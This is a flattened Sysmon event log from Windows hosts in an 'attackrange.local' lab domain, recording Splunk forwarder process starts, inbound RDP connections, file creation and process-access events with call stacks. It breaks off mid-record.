154100x8000000000000000979130Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:26.377{69CF5F33-8B36-6151-CF79-00000000FD01}4060C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000979129Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:22.250{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-49436-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x80000000000000001050506Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:25.293{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-61802-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001050505Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:27.282{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D20915015ECDE544D3893100AC7B45BB,SHA256=C68A5083EB02B005B077B67CCCB76D1F4F300772386A74F1244BDBDE30A714C7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000979172Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:27.813{69CF5F33-8B37-6151-D179-00000000FD01}31203028C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979171Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:27.673{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8B37-6151-D179-00000000FD01}3120C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979170Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:27.673{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979169Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:27.673{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979168Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:27.673{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979167Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:27.673{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979166Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:27.657{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979165Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:27.657{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979164Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:27.657{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979163Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:27.657{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979162Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:27.657{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979161Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:27.657{69CF5F33-7F27-614D-0500-00000000FD01}408984C:\Windows\system32\csrss.exe{69CF5F33-8B37-6151-D179-00000000FD01}3120C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000979160Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:27.657{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8B37-6151-D179-00000000FD01}3120C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000979159Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:27.658{69CF5F33-8B37-6151-D179-00000000FD01}3120C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001050509Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:26.660{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-52922-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001050508Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:28.347{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1F4153BE971FC0C6696D75A043DC696E,SHA256=8651D4F140D147212E93D61600402EE0803D836417163DE302B05B66049A4DF4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000979187Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:28.360{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8B38-6151-D279-00000000FD01}3512C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979186Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:28.360{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979185Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:28.360{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979184Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:28.360{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979183Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:28.360{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979182Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:28.360{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979181Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:28.360{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979180Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:28.360{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979179Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:28.360{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979178Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 